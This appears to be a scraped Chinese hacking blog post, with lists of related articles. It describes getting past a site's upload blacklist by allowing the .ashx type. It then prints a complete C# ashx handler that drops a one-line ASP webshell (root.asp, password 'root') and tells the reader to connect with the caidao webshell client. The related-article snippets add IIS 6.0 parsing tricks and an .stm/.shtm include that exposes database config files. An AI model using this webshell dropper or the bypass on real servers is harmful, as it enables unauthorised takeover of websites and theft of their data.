今天日一站

发现后台可以设置上传类型，但是asp，asa,cer等等都不行，上传之后就提示下载

尝试着关闭了下了，还是不行，后来找到了一位前辈写的文章

过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型，上传一个ashx脚本上去，
脚本内容如下：
www.92hack.net/ashx.txt
然后访问上传后的ashx文件，就会在同目录下生成一个root.asp的一句话木马，然后使用一句话木马客户端连接即可。利用方面就大家自由发挥了！

密码为root，果断菜刀连之

<%@ WebHandler Language="C#" class="Handler" %>

using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {

public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";

StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();

}

public bool IsReusable {
get {
return false;
}
}

}

没有最牛逼的方法，只有最爱思想的脑子

by:狗一样的男人

滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型相关推荐

1. 突破asa,cer,cdx,php,aspx 上传

   发现后台可以设置上传类型,但是asp,asa,cer等等都不行,上传之后就提示下载 尝试着关闭了下了,还是不行,后来找到了一位前辈写的文章 过滤了asa,cer,cdx,php,aspx等脚本类型的上 ...

2. IIS6.0 asp.asa.cer.cdx. 原理

   IIS6.0存在两种解析漏洞: 第一种是修改后缀,建立一个"*.asp;.gif"的文件,windows会将他作为一个图片解析,但IIS不会. 第二种是在目录下建立一个" ...

3. IIS6.0文件解析缺陷(asa,cer,cdx)

   IIS对文件解析可以用ISAPI扩展. 有的网站在上传检测中会用"黑名单"方法,但是有时会忽略asa.cer.cdx扩展名文件上传,以至于webshell上传成功. 这是因为默认情 ...

4. 网站不允许上传asp cer cdx htr等文件时

   当网站不允许上传 asp cer cdx htr等文件时, 上传一个stm文件, 内容为: <!--#include file="conn.asp"--> 直接请求这个 ...

5. 不允许上传asp cer cdx htr文件时解决方法

   一段代码:  <!--#e cho var="ALL_HTTP"--><br> 当前文件名称:<!--#e cho var="DOCUMEN ...

6. 当网站不允许上传asp cer cdx htr文件时的一个解决方法！

   From:http://www.neeao.info 在此感谢lcx大哥! 前些天向lcx大哥求教关于web上传的问题,说起利用stm来上传,还能执行程序,不解,就给我了一段代码: 见lcx大哥给的一 ...

7. 当网站不允许上传ASP,CGI,CER,CDX,HTR等类型的文件时

   方法:上传一个shtm文件, 内容为: <!--#include file="conn.asp"--> 直接请求这个shtm文件, conn.asp就一览无遗, 数据库 ...

8. 3万字通俗易懂告诉你什么是.NET?什么是.NET Framework？什么是.NET Core?

   通俗易懂,什么是.NET?什么是.NET Framework?什么是.NET Core? 什么是.NET?什么是.NET Framework?本文将从上往下,循序渐进的介绍一系列相关.NET的概念,先 ...

9. 【转载】通俗易懂，什么是.NET?什么是.NET Framework？什么是.NET Core?

   什么是.NET?什么是.NET Framework?本文将从上往下,循序渐进的介绍一系列相关.NET的概念,先从类型系统开始讲起,我将通过跨语言操作这个例子来逐渐引入一系列.NET的相关概念,这主要包 ...

最新文章

1. linux I/O--I/O多路复用--select总结（三）
2. GDB调试程序实例演示
3. hapi 获取 请求地址 url
4. bash颜色、变量、数组、相关脚本示例
5. vue生命周期详解、钩子函数的调用（简单易懂）
6. B程序员：讲述三年计算机学习辛酸史
7. Redis学习---（3）Redis 配置
8. BZOJ 1911: [Apio2010]特别行动队 [斜率优化DP]
9. 名震GitHub，字节跳动内部顶级数据结构刷题学习笔记根本停不下来
10. 骨传导有什么品牌，骨传导耳机品牌推荐
11. truffle init/unbox 中遇到的许多错误以及解决
12. 转载：80端口、443端口、8080端口、8000端口的区别
13. 免费资源分享（六） Unity3D 雷达实时定位插件
14. 完美解决IIS 服务器无法加载应用程序 '/LM/W3SVC/1/ROOT'。错误是 '没有注册类别
15. 国企的面试我们应该怎么准备？
16. opencv生成棋盘格
17. 李子柒：不希望年轻人当网红...
18. 微信小程序：更改字体（text）和图标（icon）的颜色以及RGB颜色值与十六进制颜色码之间的转换
19. Ubuntu 查看内核版本
20. 抓包和网络镜像 华为交换机S2300

热门文章

1. thinkphp5之腾讯视频hls片批量多线程下载自动合成mp4
2. 蚂蚁链开源跨链技术 加速大规模创新应用“涌现”
3. unity3d android jar,c# – 访问unity3d中的android jar
4. 2018年最全Go语言实战抽奖系统教程
5. 卸载计算机更新程序包,Win7清除Win10更新安装包的方法
6. Vista不是黄金甲
7. 新加坡金融科技节 | 蚂蚁金服CTO程立：面向全球开放，与合作伙伴共赢 1
8. “新四大发明”走出去：“小鲜肉之国”孟加拉也有“支付宝”啦
9. 企业运维容器之 docker仓库
10. [卓意听书]6月感恩活动，Q币送不停！